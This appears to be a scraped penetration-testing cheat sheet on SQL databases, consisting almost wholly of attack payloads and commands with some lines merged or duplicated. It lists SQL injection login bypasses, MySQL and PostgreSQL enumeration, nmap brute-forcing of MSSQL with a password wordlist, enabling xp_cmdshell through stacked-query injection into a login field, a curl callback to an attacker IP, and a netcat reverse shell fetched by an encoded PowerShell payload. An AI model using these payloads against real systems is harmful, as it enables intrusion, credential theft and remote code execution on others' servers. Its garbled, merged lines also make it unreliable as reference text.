SQL
Login Bypasses
' OR 1=1' --
' or 1=1 --
' OR '' = '
admin' -- //
admin' or 'MySQL
PostgreSQL
MSSQL
Enumerate
Last updated
' OR 1=1' --
' or 1=1 --
' OR '' = '
admin' -- //
admin' or 'Last updated
systemctl status mysql
systemctl restart mysql
mysql -u nurhodelta -p
SHOW DATABASES;
USE employee_akpoly;
SELECT * FROM tblemployee;
SELECT * FROM tblleave;# Nmap scan
nmap -T4 -sV -p 5432,5433
# Connect
psql -h IP -U user -d databasenmap -n -v -sV -Pn -p 1433 -script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password
10.10.194.142
# Brute force
nmap -n -sV -Pn -p 1433 -script ms-sql-brute -script-args
userdb=users_ldap.txt,passdb=/usr/share/wordlists/rockyou.tx 10.10.194.142# Impacket
impacket-mssqlclient Administrator:[email protected] -windows-auth
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
# Identify sleep 10sec
';waitfor delay '0:0:10'--
# Enable xp_cmdshell
UsernameTextBox=admin';EXEC sp_configure 'show advanced options', 1--+
UsernameTextBox=admin';RECONFIGURE--+
UsernameTextBox=admin';EXEC sp_configure 'xp_cmdshell', 1--+
UsernameTextBox=admin';RECONFIGURE--+
# Verify
Python -m http.server 80
UsernameTextBox=admin';EXEC xp_cmdshell 'curl http://192.168.45.227'--+&...
# RCE
rlwrap nc -lvnp 4444
UsernameTextBox=admin';EXEC xp_cmdshell 'powershell -e B64PAYLOAD=='&PasswordTextBox=...